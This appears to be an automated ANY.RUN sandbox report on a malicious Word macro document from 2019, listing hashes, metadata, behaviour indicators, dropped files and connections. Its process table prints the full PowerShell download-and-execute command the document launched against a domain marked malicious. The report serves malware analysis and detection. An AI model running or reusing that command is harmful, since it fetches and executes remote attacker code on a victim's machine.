analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

Nuovo_documento_31.doc

Full analysis: https://app.any.run/tasks/dad664fb-4a12-4f58-93fc-3013a39b0de6
Verdict: Malicious activity
Analysis date: October 14, 2019, 10:24:39
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
maldoc-4
Indicators:
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.3, Code page: 1252, Author: Administrator, Template: Normal.dotm, Last Saved By: Administrator, Revision Number: 9, Name of Creating Application: Microsoft Office Word, Total Editing Time: 12:00, Create Time/Date: Fri Oct 11 18:18:00 2019, Last Saved Time/Date: Mon Oct 14 03:40:00 2019, Number of Pages: 1, Number of Words: 0, Number of Characters: 1, Security: 0
MD5:

4D8B096372DECB7F521124EA1D4FFAE7

SHA1:

BCFE05AE9EEB980AF839F0AB0B847912D8F60967

SHA256:

5B2B1C415A385E6CEAA7E55A552B074F4A353546E8FE7AD2E8264B02BD158E1F

SSDEEP:

3072:NvaU+HscWycwdtQNclQdIkIqWDEcAbCGB74/DIk5SEq:Ja1shhwoNclQbIqWDEcAmS4rIK

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Executes PowerShell scripts

      • WINWORD.EXE (PID: 2776)
    • Unusual execution from Microsoft Office

      • WINWORD.EXE (PID: 2776)
  • SUSPICIOUS

    • Creates files in the user directory

      • powershell.exe (PID: 2136)
  • INFO

    • Creates files in the user directory

      • WINWORD.EXE (PID: 2776)
    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 2776)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

Title: -
Subject: -
Author: Administrator
Keywords: -
Comments: -
Template: Normal.dotm
LastModifiedBy: Administrator
RevisionNumber: 9
Software: Microsoft Office Word
TotalEditTime: 12.0 minutes
CreateDate: 2019:10:11 17:18:00
ModifyDate: 2019:10:14 02:40:00
Pages: 1
Words: -
Characters: 1
Security: None
CodePage: Windows Latin 1 (Western European)
Company: -
Lines: 1
Paragraphs: 1
CharCountWithSpaces: 1
AppVersion: 16
ScaleCrop: No
LinksUpToDate: No
SharedDoc: No
HyperlinksChanged: No
TitleOfParts: -
HeadingPairs:
  • Title
  • 1
CompObjUserTypeLen: 32
CompObjUserType: Microsoft Word 97-2003 Document
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
38
Monitored processes
2
Malicious processes
1
Suspicious processes
0

Behavior graph

Click at the process to see the details
start winword.exe no specs powershell.exe

Process information

PID
CMD
Path
Indicators
Parent process
2776"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\Nuovo_documento_31.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
2136"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" iex ((New-Object Net.WebClient).DownloadString('http://jes.dhinsuranceservices.com/?need=stafhxt&vid=dpec10&22997'));C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
WINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
1 847
Read events
1 112
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
2
Text files
0
Unknown types
2

Dropped files

PID
Process
Filename
Type
2776WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVRBA32.tmp.cvr
MD5:
SHA256:
2136powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\NKBMRY9PSPTHS0PDP03G.temp
MD5:
SHA256:
2776WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~$ovo_documento_31.docpgc
MD5:02E67CE8A93E01E888F72DE46E984768
SHA256:0F9E38A08638A56A025130F9E4B77C1D623C69854C6AF2ACD31F60313ABF08D4
2136powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF39c31c.TMPbinary
MD5:35375F3D71AE42AA9777154D256B33BF
SHA256:BCFF55E0934722E7952EA75D73AE7CE376E4ADBC73DE5E71D629975E9EAC87EF
2776WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:C6833E03EC8786A0673353CFC2BDB785
SHA256:B954983CE1F4CCDCF3EA7363DD19CF8FE52889132E50216362D9C85F57AA1B90
2136powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:35375F3D71AE42AA9777154D256B33BF
SHA256:BCFF55E0934722E7952EA75D73AE7CE376E4ADBC73DE5E71D629975E9EAC87EF
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
0
TCP/UDP connections
1
DNS requests
1
Threats
0

HTTP requests

No HTTP requests
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2136
powershell.exe
185.189.151.22:80
jes.dhinsuranceservices.com
SOFTplus Entwicklungen GmbH
CH
malicious

DNS requests

Domain
IP
Reputation
jes.dhinsuranceservices.com
  • 185.189.151.22
malicious

Threats

No threats detected
No debug info